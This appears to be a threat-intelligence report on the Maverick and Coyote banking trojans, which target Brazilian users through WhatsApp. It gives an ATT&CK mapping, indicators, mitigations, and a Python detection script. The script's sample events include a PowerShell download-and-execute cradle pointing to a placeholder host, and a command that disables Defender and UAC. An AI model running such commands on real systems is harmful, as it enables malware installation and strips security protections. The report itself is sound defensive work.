Full Report
Threat hunters have uncovered similarities between the Coyote banking malware and a newly disclosed malicious program dubbed Maverick that is propagated via WhatsApp. According to a report from CyberProof, both strains are written in .NET, target Brazilian users and banks, and share identical functionality for decrypting their lists of targeted banking URLs and for monitoring banking applications.
Analysis Summary
# Tool/Technique: Maverick and Coyote Banking Malware
## Overview
Maverick is a newly disclosed banking malware closely related to the existing banking malware Coyote. Both malware strains are designed to target banking users in Brazil, leveraging social engineering via WhatsApp to propagate and ultimately steal financial credentials by monitoring banking application usage and URLs.
## Technical Details
- Type: Malware family (Banking Trojan)
- Platform: Windows (Inferred from LNK file execution, PowerShell, cmd.exe usage)
- Capabilities: Credential theft, self-propagation via WhatsApp Web, anti-analysis, system fingerprinting (targeting Brazil).
- First Seen: Maverick documented "early last month" (prior to the Nov 11, 2025 article date).
## MITRE ATT&CK Mapping
*Note: Mappings are based on described functionality and may not be exhaustive.*
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.003 - Spearphishing via Service (ZIP archive containing an LNK shortcut, delivered through WhatsApp messages rather than e-mail)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell (Used for downloading payloads and disabling security features)
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder (Inferred, though specific persistence mechanism wasn't detailed in the excerpt beyond multi-vector persistence noted for the actor)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Obfuscated VBS downloader)
- T1055 - Process Injection (Potential, inferred by loader behavior)
- T1562 - Impair Defenses
- T1562.001 - Disable or Modify Tools (Disabling Microsoft Defender Antivirus)
- **TA0007 - Discovery**
- T1082 - System Information Discovery (Time zone and date/time format checks)
- T1614 - System Location Discovery
- T1614.001 - System Language Discovery (Language and region checks used to restrict execution to hosts in Brazil)
- **TA0008 - Lateral Movement** (SORVEPOTEL spreading component)
- T1566.003 - Spearphishing via Service (Sends the malicious ZIP from the hijacked WhatsApp Web session to the victim's contacts; ATT&CK catalogues this under Initial Access, so the spreading step is the same phishing technique reapplied from the victim's account rather than a distinct lateral-movement technique)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Communication with C2 server)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Banking Targeting:** Monitors active browser tabs for URLs matching hard-coded lists of Brazilian financial institutions.
- **Credential Theft:** Fetches phishing pages from a remote server to steal user credentials when a banking URL is detected.
- **Geo-fencing:** Restricts execution only to hosts verified to be located in Brazil (by checking time zone, language, region, and date/time format).
- **.NET Implantation:** Malware strains are written in the .NET framework.
### Advanced Features
- **WhatsApp Propagation (SORVEPOTEL/Maverick):** Hijacks WhatsApp Web sessions using ChromeDriver and Selenium to automatically download and distribute the malicious ZIP archive to all contacts.
- **Staged Execution:** Uses an obfuscated VBS downloader (`Orcamento.vbs`) and PowerShell (`tadeu.ps1`) to execute payloads in memory.
- **Security Disablement:** PowerShell script launches intermediate tools to disable Microsoft Defender Antivirus and User Account Control (UAC).
- **Anti-Analysis:** The .NET loader includes checks to self-terminate if reverse engineering tools are detected.
- **Command and Control (C2) Management:** The associated threat actor (Water Saci) uses a sophisticated C2 system allowing real-time management, including pausing, resuming, and monitoring the campaign.
## Indicators of Compromise
*Note: Specific file hashes, registry keys, and detailed network IOCs were not provided in the excerpt; the following are derived from the attack chain structure.*
- File Hashes: [Not specified]
- File Names: `Orcamento.vbs` (SORVEPOTEL/VBS downloader), ZIP archive containing the Maverick payload, LNK shortcut file.
- Registry Keys: [Not specified]
- Network Indicators: `zapgrande[.]com` (C2 server contact for first-stage payload download)
- Behavioral Indicators: Execution of `cmd.exe` or `PowerShell` triggered by an LNK file, automation scripts (ChromeDriver/Selenium) manipulating WhatsApp Web interface, system checks for Brazilian language/region settings.
## Associated Threat Actors
- **Water Saci:** Name assigned by Trend Micro to the actor behind this attack chain, which employs email-based C2 infrastructure and multi-vector persistence.
## Detection Methods
- Signature-based detection: Detection based on known static artifacts of the .NET executables (Coyote/Maverick).
- Behavioral detection: Monitoring for automation tools (Selenium/ChromeDriver) interacting with WhatsApp Web URLs, disabling security features via PowerShell, and checking system localization settings against expected values.
- YARA rules: Potential for YARA rules targeting the distinctive .NET logic or shared code overlaps between Coyote and Maverick.
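The behavioral indicators above map directly onto process-creation telemetry. The following is an added example (not code from CyberProof, Trend Micro, or the malware itself) that runs three heuristics over constructed Sysmon Event ID 1 style records: a script host spawned by `explorer.exe` with a download cradle (how an LNK double-click appears in telemetry), PowerShell tampering with Defender or UAC, and WebDriver automation of a browser pointed at WhatsApp Web. All file paths, ports and command lines in the sample events are constructed for illustration and are not indicators from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine).
# Paths and command lines are illustrative, not IOCs published in the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c powershell -w hidden -ep bypass -c "iwr hxxp://downloader.invalid/tadeu.ps1 | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true; reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"'},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\chromedriver.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "CommandLine": r"chromedriver.exe --port=51234"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\chromedriver.exe",
     "CommandLine": r"chrome.exe --enable-automation --remote-debugging-port=0 https://web.whatsapp.com"},
    # Benign noise: a user opening WhatsApp Web by hand, and an admin querying Defender status.
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"chrome.exe https://web.whatsapp.com"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-MpComputerStatus"},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
WEBDRIVERS = {"chromedriver.exe", "msedgedriver.exe", "geckodriver.exe"}

# Download-cradle and policy-bypass vocabulary typical of a first-stage PowerShell one-liner.
CRADLE_RE = re.compile(
    r"(?i)(iwr|invoke-webrequest|downloadstring|downloadfile|\biex\b|invoke-expression|"
    r"-ep\s+bypass|-w(indowstyle)?\s+hidden|-enc\b)")
# Defender disablement via cmdlet, Defender exclusions, or UAC registry keys set to 0.
TAMPER_RE = re.compile(
    r"(?i)(set-mppreference\s+-disable\w+|add-mppreference\s+-exclusion|"
    r"\\Policies\\System\b.*\b(EnableLUA|ConsentPromptBehaviorAdmin)\b.*/d\s+0)")
# Flags Selenium/ChromeDriver passes to the browser it controls.
AUTOMATION_RE = re.compile(r"(?i)--enable-automation|--remote-debugging-port")
WHATSAPP_RE = re.compile(r"(?i)web\.whatsapp\.com")


def base(path):
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def classify(ev):
    """Return the rule names a single process-creation event matches."""
    img, parent, cmd = base(ev["Image"]), base(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    # 1. Script host launched by explorer.exe (LNK double-click) carrying a download cradle.
    if img in SCRIPT_HOSTS and parent == "explorer.exe" and CRADLE_RE.search(cmd):
        hits.append("lnk_style_script_cradle")
    # 2. Defender or UAC tampered with from any script host, regardless of parent.
    if img in SCRIPT_HOSTS and TAMPER_RE.search(cmd):
        hits.append("defender_or_uac_tamper")
    # 3. WebDriver on an end-user host, or a browser started by / flagged as automated.
    if img in WEBDRIVERS:
        hits.append("webdriver_execution")
    if img in BROWSERS and (parent in WEBDRIVERS or AUTOMATION_RE.search(cmd)):
        hits.append("automated_browser_whatsapp" if WHATSAPP_RE.search(cmd) else "automated_browser")
    return hits


def detect(events):
    """Run classify() over a batch and keep only events that fired at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        rules = classify(ev)
        if rules:
            findings.append({"index": i, "image": base(ev["Image"]), "rules": rules})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The two benign records are there to show the rules' boundaries: a browser opened from `explorer.exe` with a WhatsApp URL is not flagged, and neither is a PowerShell session that only reads Defender status. Rule 3 is the highest-signal one on end-user workstations, since ChromeDriver has no legitimate reason to run there outside developer or QA roles; the first two rules are noisier and belong in a correlation with the LNK-in-ZIP delivery rather than as stand-alone alerts.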
## Mitigation Strategies
- **User Education:** Caution users against downloading and extracting unknown ZIP archives, especially those received via chat applications like WhatsApp, even from known contacts.
- **Endpoint Security:** Ensure robust endpoint detection and response (EDR) capable of detecting security tool disablement (Defender, UAC) via script execution, and keep Microsoft Defender Tamper Protection enabled so that `Set-MpPreference` calls and registry edits from a first-stage script cannot silently turn off real-time protection.
- **Application Control:** Restrict the execution of unapproved PowerShell scripts or VBS files.
- **Security Hardening:** Treat WebDriver binaries (ChromeDriver, msedgedriver) as unexpected on end-user workstations outside development and QA roles, and alert on their execution and on browsers launched with automation or remote-debugging flags, since this is how the campaign hijacks the WhatsApp Web session.
## Related Tools/Techniques
- **Coyote:** A highly similar banking malware strain also targeting Brazilian users, suggesting Maverick may be a variant or evolution of Coyote.
- **SORVEPOTEL:** The component of the campaign responsible for initial delivery and self-propagation via WhatsApp Web hijacking.